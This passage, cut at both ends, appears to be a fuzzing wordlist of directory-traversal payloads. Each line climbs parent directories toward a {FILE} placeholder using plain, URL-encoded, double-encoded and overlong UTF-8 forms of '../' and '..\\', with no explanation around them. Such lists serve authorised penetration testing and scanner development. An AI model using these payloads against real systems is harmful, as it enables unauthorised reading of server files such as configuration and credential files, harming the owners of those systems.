%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}\n/%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}\n/..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}\n/..%c1%9c{FILE}\n/..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}\n/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}\n/%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}\n/%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}\n/..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}\n/..%%32%66{FILE}\n/..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}\n/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}\n/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}\n/..%%35%63{FILE}\n/..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}\n/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}\n/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}\n/%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}\n/../{FILE}\n/../../{FILE}\n/../../../{FILE}\n/../../../../{FILE}\n/../../../../../{FILE}\n/../../../../../../{FILE}\n/../../../../../../../{FILE}\n/../../../../../../../../{FILE}\n/..%2f{FILE}\n/..%2f..%2f{FILE}\n/..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/..%252f{FILE}\n/..%252f..%252f{FILE}\n/..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/..\\{FILE}\n/..\\..\\{FILE}\n/..\\..\\..\\{FILE}\n/..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..%5c{FILE}\n/..%5c..%5c{FILE}\n/..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/..%255c{FILE}\n/..%255c..%255c{FILE}\n/..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/../{FILE}\n/../../{FILE}\n/../../../{FILE}\n/../../../../{FILE}\n/../../../../../{FILE}\n/../../../../../../{FILE}\n/../../../../../../../{FILE}\n/../../../../../../../../{FILE}\n/..%2f{FILE}\n/..%2f..%2f{FILE}\n/..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}\n/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}\n/%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}\n/..%252f{FILE}\n/..%252f..%252f{FILE}\n/..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}\n/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}\n/%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%